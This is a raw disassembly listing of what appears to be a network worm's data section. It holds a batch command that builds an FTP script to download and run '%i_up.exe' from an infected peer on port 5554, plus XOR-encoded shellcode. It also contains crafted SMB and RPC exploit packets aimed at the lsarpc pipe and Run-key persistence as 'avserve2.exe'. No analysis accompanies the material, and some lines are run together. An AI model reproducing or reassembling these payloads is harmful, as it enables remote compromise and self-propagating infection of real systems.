dword_405428	dd 0FFFFFFFFh, 403815h,	403819haGetlastactivep	db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+3Do
		align 4
aGetactivewindo	db 'GetActiveWindow',0  ; DATA XREF: ___crtMessageBoxA+35o
aMessageboxa	db 'MessageBoxA',0      ; DATA XREF: ___crtMessageBoxA+24o
aUser32_dll	db 'user32.dll',0       ; DATA XREF: ___crtMessageBoxA+Do
		align 10h
dword_405470	dd 0FFFFFFFFh, 40480Eh,	404812h, 0FFFFFFFFh, 4048C2h, 4048C6h
					; DATA XREF: ___crtLCMapStringA+5o
		dd 55CCh, 2 dup(0)
		dd 561Ch, 50E0h, 5500h,	2 dup(0)
		dd 5714h, 5014h, 55D4h,	2 dup(0)
		dd 5722h, 50E8h, 54ECh,	2 dup(0)
		dd 5774h, 5000h, 5 dup(0)
		dd 77E34D78h, 77DFC41Bh, 77DDEBE7h, 77DD6BF0h, 0
		dd 7C801D77h, 7C80BE01h, 7C834E64h, 7C838AE7h, 7C8365A5h
		dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
		dd 7C86136Dh, 7C910331h, 7C80929Ch, 7C80E93Fh, 7C8286EEh
		dd 7C821363h, 7C80ADA0h, 7C9179FDh, 7C809A51h, 7C9105D4h
		dd 7C8127A7h, 7C809915h, 7C812E76h, 7C80A490h, 7C838A0Ch
		dd 7C809BF8h, 7C810D87h, 7C937A40h, 7C91043Dh, 7C809AE4h
		dd 7C812BB6h, 7C810EF8h, 7C810E51h, 7C80CCA8h, 7C838DE8h
		dd 7C80B6A1h, 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C81CDDAh
		dd 7C801E16h, 7C80DDF5h, 7C862E2Ah, 7C81DF77h, 7C814AE7h
		dd 7C80A0D4h, 7C81CF5Bh, 7C812F08h, 7C80CC97h, 7C812F39h
		dd 0
		dd 7E41A8ADh, 0
		dd 71AC1028h, 71AB615Ah, 71AB428Ah, 71AB2B66h, 71AB3B91h
		dd 71AB406Ah, 71AB88D3h, 71AB50C8h, 71AB3F41h, 71AB2BF4h
		dd 71AB4FD4h, 71AB664Dh, 71AB3E00h, 71AB9639h, 0
		dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
		dd 6C6Ch, 65470000h, 6F725074h,	64644163h, 73736572h, 0
aLoadlibrarya	db 'LoadLibraryA',0
		align 4
aLstrcpya	db 'lstrcpyA',0
		align 4
a_lclose	db '_lclose',0
		dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
		dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen		db '_lopen',0
		align 10h
		dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
		dd 0
aCreatethread	db 'CreateThread',0
		align 4
aWinexec	db 'WinExec',0
		dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
		dd 756F436Bh, 746Eh, 72430000h,	65746165h, 6574754Dh, 4178h
		dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
		dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
		dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu	db 'AbortSystemShutdownA',0
		align 4
aRegclosekey	db 'RegCloseKey',0
		dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya	db 'RegOpenKeyA',0
aAdvapi32_dll	db 'ADVAPI32.dll',0
		align 4
aGetmodulehandl	db 'GetModuleHandleA',0
		align 4
aGetstartupinfo	db 'GetStartupInfoA',0
		dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
		dd 69737265h, 6E6Fh, 78450000h,	72507469h, 7365636Fh, 73h
		dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc	db 'GetCurrentProcess',0
		align 10h
aUnhandledexcep	db 'UnhandledExceptionFilter',0
		align 4
aFreeenvironmen	db 'FreeEnvironmentStringsA',0
		dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
		dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
		dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
		dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
		dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount	db 'SetHandleCount',0
		align 4
		dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
		dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
		dd 72437061h, 65746165h, 0
aVirtualfree	db 'VirtualFree',0
		dd 65480000h, 72467061h, 6565h,	74520000h, 776E556Ch, 646E69h
		dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
		dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
		dd 70795467h, 4165h, 65470000h,	72745374h, 54676E69h, 57657079h
		dd 0
aGetcpinfo	db 'GetCPInfo',0
		align 4
aGetacp		db 'GetACP',0
		align 4
		dd 65470000h, 4D454F74h, 5043h,	65480000h, 6C417061h, 636F6Ch
		dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
		dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw	db 'LCMapStringW',0
		align 4
		dd 191h	dup(0)
dword_406000	dd 0		dword_406004	dd 0		dword_406008	dd 0				dd offset ___initmbctable
dword_406010	dd 0		dword_406014	dd 0		dword_406018	dd 0		dword_40601C	dd 0		dword_406020	dd 4 dup(0)	off_406030	dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AAr
					; "echo	off&echo open %s 5554>>cmd.ftp&ech"...
; char Str[]
Str		db 'ë'                  ; DATA XREF: sub_40159E+132o
					; sub_40159E+1ABo
; ---------------------------------------------------------------------------
		adc	[edx+4Ah], bl
		xor	ecx, ecx
		mov	cx, 17Dh

loc_40603E:				; CODE XREF: .text:00406042j
		xor	byte ptr [edx+ecx], 99h
		loop	loc_40603E
		jmp	short loc_40604B
; ---------------------------------------------------------------------------
		dw 0EBE8h
		db 3 dup(0FFh)
; ---------------------------------------------------------------------------

loc_40604B:				; CODE XREF: .text:00406044j
		jo	short near ptr dword_4059BC+626h
; ---------------------------------------------------------------------------
		db 0FDh, 38h, 0A9h
		dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
		dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh,	9AA612C8h
		dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
		dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
		dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
		dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh,	0F34112C3h
		dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
		dd 999B9E5Eh
dword_4060E4	dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh,	6DCE66CAh
					; DATA XREF: sub_40159E+102o
		dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh,	9D10C089h
		dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
		dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
		dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
		dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h,	5A59AA77h
		dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
		dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
		dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
		dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
		dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC	dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
					; DATA XREF: sub_401398+15Do
					; sub_40159E+2BDo
		dd 0FEFF0000h, 0
		dd 2006200h
aPcNetworkProgr	db 'PC NETWORK PROGRAM 1.0',0
		db 2
		db  4Ch	; L
		db 41h,	4Eh, 4Dh
		db  41h	; A
		db 4Eh,	31h, 2Eh
		db  30h	; 0
		align 2
		dw 5702h
aIndowsForWorkg	db 'indows for Workgroups 3.1a',0
		db 2
		dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
		dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258	dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_401398+188o
					; sub_40159E+2ECo
		dd 0FEFF0000h, 100000h,	0A400FF0Ch, 0A110400h, 0
		dd 20000000h, 0
		dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
		dd 4 dup(0)
		unicode	0, <Windows 2000 2195>,0
		unicode	0, <Windows 2000 5.0>,0
		align 10h
		dd 0
dword_406304	dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_401398+1ADo
					; sub_40159E+315o
		dd 0FEFF0000h, 200800h,	0DA00FF0Ch, 0A110400h, 0
		dd 57000000h, 0
		dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
		dd 0
		dd 47000000h, 0
		dd 40000000h, 0
		dd 40000000h, 6000000h,	40000600h, 10000000h, 47001000h
		dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
		dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
		dd 320020h, 300030h, 200030h, 310032h, 350039h,	570000h
		dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h,	200030h
		dd 2E0035h, 30h, 0
dword_4063E4	dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_401398+53o
					; sub_40159E+57o
		dd 0FEFF0000h, 300800h,	5C00FF04h, 1000800h, 3100h, 5C005Ch
		dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h,	310032h
		dd 5C0030h, 500049h
aC:					; DATA XREF: sub_401398+85o
					; sub_40159E+89o
		unicode	0, <C$>,0
a?????		db '?????',0
		align 8
dword_406448	dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_40159E+369o
		dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h,	0
		dd 2019Fh, 3 dup(0)
		dd 3, 1, 40h, 2, 1103h,	6C005Ch, 610073h, 700072h, 63h
		dd 0
dword_4064B4	dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_40159E+392o
		dd 4DC0800h, 500800h, 48000010h, 0
		dd 4, 2	dup(0)
		dd 48005400h, 2005400h,	2600h, 10005940h, 50005Ch, 500049h
		dd 5C0045h, 0
		dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
		dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh,	0F52ED94Fh
		dd 0
		dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558	dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_40159E+3C8o
		dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
		dd 0A0005400h, 200540Ch, 2600h,	100CB140h, 50005Ch, 500049h
		dd 5C0045h, 0
		dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
		dd 3ECh, 0
off_4065D8	dd offset loc_401495	; DATA XREF: sub_40159E+3F6o
		dd 3, 40707Ch, 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd offset dword_40707C
		dd 1, 0
		dd 1, 0
		dd offset dword_40707C
		dd 1, 0
		dd 1, 0
		dd offset dword_40707C
		dd 1, 0
		dd 1, 0
		dd 138578h, 0E9A65BABh,	0
dword_40666C	dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_40159E+425o
		dd 0FEFF0800h, 600800h,	0DE00FF0Eh, 4000DEh, 0FF000000h
		dd 8FFFFFFh, 10B800h, 4010B800h, 0
		dd 0EE10B900h, 1000005h, 10h, 10B8h, 1,	200Ch, 90000h
		dd 0DADh, 0
		dd 0DADh, 0
dword_4066D8	dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_40159E+450o
		dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
		dd 84005400h, 200540Fh,	2600h, 0F9540h,	50005Ch, 500049h
		dd 5C0045h, 0
		dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C	dd 0				dd 40A89Ah, 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 40A89Ah, 1, 0
		dd 1, 0
		dd 40A89Ah, 1, 0
		dd 1, 0
		dd 40A89Ah, 1, 0
		dd 1, 4	dup(0)
		dd 20h,	0Ch dup(0)
dword_406810	dd 1004600h						; sub_40159E+19Er
		dd 1, 20h, 0Ch dup(0)
		dd 7515123Ch, 2, 20h, 0Ch dup(0)
		dd 751C123Ch, 0Fh dup(0)
; char *off_4068C8
off_4068C8	dd offset aAvserve2_exe	; DATA XREF: sub_4020D7:loc_40212Fr
					; sub_4020D7+B5r
					; "avserve2.exe"
		dd offset aAvserve2	; "avserve2"
; char *off_4068D0
off_4068D0	dd offset dword_406910	; DATA XREF: sub_401B08+1Ar
					; sub_401B08+2Dr
; char *off_4068D4
off_4068D4	dd offset dword_406908	; DATA XREF: sub_401B08+77r
					; sub_401B08+84r
; char *off_4068D8
off_4068D8	dd offset dword_406900	; DATA XREF: sub_401B08+A8r
					; sub_401B08+B5r
; char *off_4068DC
off_4068DC	dd offset dword_4068F8	; DATA XREF: sub_401B08+2BCr
					; sub_401B08+2C9r ...
; char *off_4068E0
off_4068E0	dd offset dword_4068F0	; DATA XREF: sub_401B08+184r
					; sub_401B08+191r
; char *off_4068E4
off_4068E4	dd offset dword_4068E8	; DATA XREF: sub_401B08+1B9r
					; sub_401B08+1C6r
dword_4068E8	dd 20303531h, 0A4B4Fhdword_4068F0	dd 20303032h, 0A4B4Fhdword_4068F8	dd 20363232h, 0A4B4Fhdword_406900	dd 20303332h, 0A4B4Fhdword_406908	dd 20313333h, 0A4B4Fhdword_406910	dd 20303232h, 0A4B4FhaAvserve2	db 'avserve2',0         ; DATA XREF: .text:004068CCo
		align 4
aAvserve2_exe	db 'avserve2.exe',0     ; DATA XREF: .text:off_4068C8o
		align 4
aEchoOffEchoOpe	db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
					; DATA XREF: .text:off_406030o
		db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
		db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
		db 0Ah,0
		align 4
a127_0_0_1	db '',0        ; DATA XREF: sub_4010D2:loc_401140o
		align 4
aCWin2_log	db 'c:\win2.log',0      ; DATA XREF: sub_401210+27o
aI		db '%i',0               ; DATA XREF: sub_401210+16o
		align 4
aSC		db '%s%c',0             ; DATA XREF: sub_401398+1DFo
		align 10h
aSIpc		db '\\%s\ipc$',0        ; DATA XREF: sub_401398+20o
					; sub_40159E+23o
		align 4
dword_406A2C	dd 6EB06EBh, 0	dword_406A34	dd 1CEC8166h	dword_406A38	dd 0E4FF07h	; char a5_0[]
a5_0		db '5.0',0              ; DATA XREF: sub_401A84+4Ao
; char SubStr[]
SubStr		db '5.1',0              ; DATA XREF: sub_401A84+27o
; char aQuit[]
aQuit		db 'QUIT',0             ; DATA XREF: sub_401B08+2DAo
		align 4
; char aRetr[]
aRetr		db 'RETR',0             ; DATA XREF: sub_401B08+1A2o
		align 4
aI_I_I_I	db '%i.%i.%i.%i',0      ; DATA XREF: sub_401B08+173o
					; sub_401EF0+D2o
word_406A60	dw 2Ch			; DATA XREF: sub_401B08+EEr
		align 4
; char aPort[]
aPort		db 'PORT',0             ; DATA XREF: sub_401B08+C6o
		align 4
; char aPass[]
aPass		db 'PASS',0             ; DATA XREF: sub_401B08+95o
		align 4
; char aUser[]
aUser		db 'USER',0             ; DATA XREF: sub_401B08+64o
		align 4
; char asc_406A7C[]
asc_406A7C:				; DATA XREF: sub_401EF0+102o
		unicode	0, < >,0
aJumpallsnlstil	db 'JumpallsNlsTillt',0 ; DATA XREF: WinMain(x,x,x,x)+50o
		align 4
aJobaka3	db 'Jobaka3',0          ; DATA XREF: WinMain(x,x,x,x)+Fo
aSoftwareMicros	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_4020D7+8Co
		align 4
; char asc_406ACC[]
asc_406ACC:				; DATA XREF: sub_4020D7+4Bo
		unicode	0, <\>,0
off_406AD0	dd offset __exit	; DATA XREF: __amsg_exit+1Cr
dword_406AD4	dd 2							; __NMSG_WRITE+46r
		align 10h
off_406AE0	dd offset __wctype+2	; DATA XREF: _isalnum+1Er
					; __isctype+12r ...
		dd offset __wctype+2
		public __wctype
; const	unsigned __int16 _wctype[]
__wctype	dd    200000h		; DATA XREF: _x_ismbbtype+18r
					; .text:off_406AE0o ...
		unicode	0, <	    (((((		   H>
		dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
		dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
		dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CEC	dd 1				dd 2Eh,	1
dword_406CF8	dd 0C0000005h						; _xcptlookup+11o
		dd 0Bh,	0
		dd 0C000001Dh, 4, 0
		dd 0C0000096h, 4, 0
		db 8Dh,	0
		dw 0C000h
		dd 8, 0
		dd 0C000008Eh, 8, 0
		dd 0C000008Fh, 8, 0
		db 90h
		db 2 dup(0), 0C0h
		dd 8, 0
		dd 0C0000091h, 8, 0
		dd 0C0000092h, 8, 0
		dd 0C0000093h, 8, 0
dword_406D70	dd 3		dword_406D74	dd 7		dword_406D78	dd 0Ah		dword_406D7C	dd 8Ch							; __XcptFilter+8Fw ...
		dd 0FFFFFFFFh, 0A00h, 10h
dword_406D8C	dd 19930520h, 4	dup(0)					; __NLG_Notify+2o
dword_406DA0	dd 2							; __NMSG_WRITE+28r
off_406DA4	dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+FCr
					; __NMSG_WRITE+12Dr
					; "R6002\r\n- floating point not loaded\r\n"
		dd 8, 40536Ch, 9, 405340h, 0Ah,	40531Ch, 10h, 4052F0h
		dd 11h,	4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
		dd 19h,	405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
		dd 78h,	405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
		dd 0FFh, 405134h
byte_406E30	db 1			; DATA XREF: __NMSG_WRITE+1Bo
					; __setmbcp+E1r
		db 2, 4, 8
		align 8
dword_406E38	dd 3A4h				dd 82798260h, 21h, 0	; DATA XREF: __setmbcp+11Dr
dword_406E48	dd 0DFA6h			align 10h
		dd 0A5A1h, 0
		dd 0FCE09F81h, 0
		dd 0FC807E40h, 0
		dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE40h, 0
		dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE41h, 0
		dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
		dd 0FE81h, 0
		dd 0FEA17E40h, 0
		dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
		dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F28	dd 3F8h							; __heap_alloc+5r
		align 10h
dword_406F30	dd 86771304h						; sub_401000+10w ...
dword_406F34	dd 0							; sub_401210+Dr
; char Source[]
Source		db 4 dup(0)		; DATA XREF: sub_40127D+89o
					; sub_401398+Co ...
dword_406F3C	dd 0		; char *dword_406F40
dword_406F40	dd 0							; __setenvp:loc_402DB1r ...
		align 8
dword_406F48	dd 0							; _fast_error_exitr ...
		dd 3 dup(0)
dword_406F58	dd 0A28h	dword_406F5C	dd 501h		dword_406F60	dd 5		dword_406F64	dd 1		dword_406F68	dd 1		dword_406F6C	dd 910ED0h			dd 0
dword_406F74	dd 910D70h			dd 3 dup(0)
off_406F84	dd offset aCM_unpackerPac ; DATA XREF: __setargv+2Ew
					; "C:\\m_unpacker\\packed.exe"
		dd 0
byte_406F8C	db 0			; DATA XREF: _doexit+2Dw
		align 10h
dword_406F90	dd 0		dword_406F94	dd 0		dword_406F98	dd 0							; __XcptFilter+46w ...
aCM_unpackerPac	db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv:loc_402E6Fo
					; .text:off_406F84o
		align 4
		dd 31h dup(0)
dword_40707C	dd 9 dup(0)						; .text:00406638o ...
dword_4070A0	dd 1							; ___crtGetEnvironmentStringsA+23w ...
dword_4070A4	dd 0		dword_4070A8	dd 1							; ___crtGetStringTypeA:loc_403786w
dword_4070AC	dd 1							; _getSystemCP+4w ...
dword_4070B0	dd 0							; ___crtMessageBoxA+2Ew ...
dword_4070B4	dd 0							; ___crtMessageBoxA:loc_4045C2r
dword_4070B8	dd 0							; ___crtMessageBoxA+60r
		dd 2 dup(0)
dword_4070C4	dd 0				dd 3 dup(0)
dword_4070D4	dd 0							; _getSystemCP+3Ar ...
		dd 0
dword_4070DC	dd 1							; ___crtLCMapStringA+4Cw ...
dword_4070E0	dd 0		dword_4070E4	dd 0		dword_4070E8	dd 10h							; ___sbh_alloc_new_region+5r ...
dword_4070EC	dd 0							; ___sbh_free_block+259r ...
dword_4070F0	dd 330650h						; ___sbh_free_block+310w ...
; void *Dst
Dst		dd 0			; DATA XREF: ___sbh_heap_init:loc_403D47w
					; ___sbh_free_block+22Cr ...
dword_4070F8	dd 1							; ___sbh_find_blockr ...
dword_4070FC	dd 330650h						; ___sbh_find_block+8r	...
dword_407100	dd 4E4h							; __setmbcp+65w ...
		align 10h
dword_407110	dd 3 dup(0)						; __setmbcp+171o ...
dword_40711C	dd 0							; __setmbcp+15Dw ...
byte_407120	db 0			; DATA XREF: _setSBUpLow:loc_403BF2w
					; _setSBUpLow:loc_403C0Fw ...
		align 4
		dd 0Fh dup(0)
		dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
		dd 77767574h, 7A7978h, 0
		dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
		dd 57565554h, 5A5958h, 0
		dd 83000000h, 0
		dd 9A0000h, 9E009Ch, 2 dup(0)
		dd 8A0000h, 0FF8E008Ch,	2 dup(0)
		dd 0AA0000h, 2 dup(0)
		dd 0B500h, 0BA0000h, 0
		dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
		dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
		dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
		dd 9FDEDDDCh
byte_407220	db 0			; DATA XREF: __setmbcp+5Co
					; __setmbcp+AFo ...
byte_407221	db 0			; DATA XREF: _parse_cmdline+3Fr
					; _parse_cmdline+84r ...
		align 4
		dd 0Fh dup(0)
		dd 10100000h, 6	dup(10101010h),	0
		dd 20200000h, 6	dup(20202020h),	2 dup(0)
		dd 20h,	10000000h, 10001000h, 2	dup(0)
		dd 20000000h, 20002000h, 10h, 0
		dd 20000000h, 2	dup(0)
		dd 200000h, 20000000h, 0
		dd 10101000h, 5	dup(10101010h),	10101000h, 10101010h, 6	dup(20202020h)
		dd 20202000h, 20202020h, 20h
dword_407324	dd 0							; __setmbcp+12Bw ...
dword_407328	dd 330000h						; __heap_init+29r ...
		dd 5 dup(0)
dword_407340	dd 910EF0h						; __ioinit+45r	...
dword_407344	dd 3Fh dup(0)	dword_407440	dd 20h							; __ioinit:loc_403261r	...
dword_407444	dd 1		dword_407448	dd 1		dword_40744C	dd 0		dword_407450	dd 0		dword_407454	dd 0		dword_407458	dd 142340h			dd 6E9h	dup(0)
_text		ends

; Section 3. (virtual address 00021000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00020200
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 421000h
		align 2000h
_idata2		ends

		end start